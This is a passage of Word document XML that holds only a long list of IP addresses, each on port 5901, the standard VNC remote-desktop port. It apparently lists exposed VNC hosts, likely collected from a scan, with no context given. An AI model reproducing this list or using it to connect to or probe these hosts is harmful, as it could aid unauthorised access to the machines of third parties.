        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">110.249.208.21:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.87:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.88:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.37:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.1:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.14:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.90:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.7:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.12:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.24:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.97:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.49:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.35:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.55:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.117:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.44:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.56:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.66:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.60:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.95:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.80:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.91:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">110.249.208.82:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.111:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.86:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.98:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.102:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.121:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.148:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.82.244.231:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.82.185.200:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.90.170.88:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.90.218.68:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.95.228.110:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.111.143.132:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.132.231.253:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">113.5.32.137:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">113.56.24.92:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">113.57.219.11:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">114.112.56.90:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">114.242.179.14:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">114.251.88.36:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">114.251.88.35:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">114.255.56.82:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">114.255.190.198:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">115.60.213.137:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">115.85.238.104:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.78.0.148:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.78.0.185:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.78.2.213:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.121.7.100:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.121.7.99:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.121.7.101:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.18.79.12:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.194.50.89:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.194.50.107:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.212.168.135:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.212.132.99:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.212.168.134:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.212.168.133:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.194.229.10:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">119.6.202.64:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">119.48.132.169:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">119.48.132.165:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">119.48.132.173:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">119.39.227.228:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">119.62.123.228:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">119.178.12.133:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">119.48.132.170:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">119.253.8.38:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">119.253.8.39:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">119.178.12.132:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.83.5.12:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.83.5.18:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.83.5.24:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.83.5.36:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.83.5.140:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.83.5.146:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.83.5.53:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.83.5.6:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">121.22.33.30:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">121.28.82.134:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">121.31.114.108:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.141.229.140:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.141.250.165:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.143.3.40:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.102.44.134:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">123.7.17.200:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">123.123.108.252:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">123.138.20.35:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">123.234.48.225:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">123.234.48.222:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">123.234.48.221:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">123.242.146.68:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">123.242.146.70:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">123.242.146.75:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">123.242.146.74:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">123.242.146.69:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.67.21.146:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">123.234.48.220:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.95.180.148:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.133.2.241:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.128.36.20:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.135.3.143:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.160.194.74:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.160.194.108:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.167.231.77:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">125.32.114.89:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">125.45.149.155:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">125.45.158.7:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">125.46.23.231:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">125.91.251.177:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">140.206.114.230:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.23.30.37:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.23.30.38:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.42.176.8:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.42.176.4:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.42.176.7:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.42.176.10:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.184.223.130:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.70.70.45:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.98.225.252:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.98.152.167:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.98.225.253:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.99.222.86:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.99.222.85:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.102.86.61:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.102.241.221:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.108.12.226:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.108.15.174:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">202.108.15.223:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.131.233.201:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.181.237.73:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.93.0.18:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.135.164.42:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.160.81.56:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.13.93.37:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.14.133.3:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.14.134.3:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.14.134.4:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.14.133.182:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.14.134.9:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.14.133.163:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.14.159.229:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.14.134.24:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.14.134.19:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.14.134.27:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
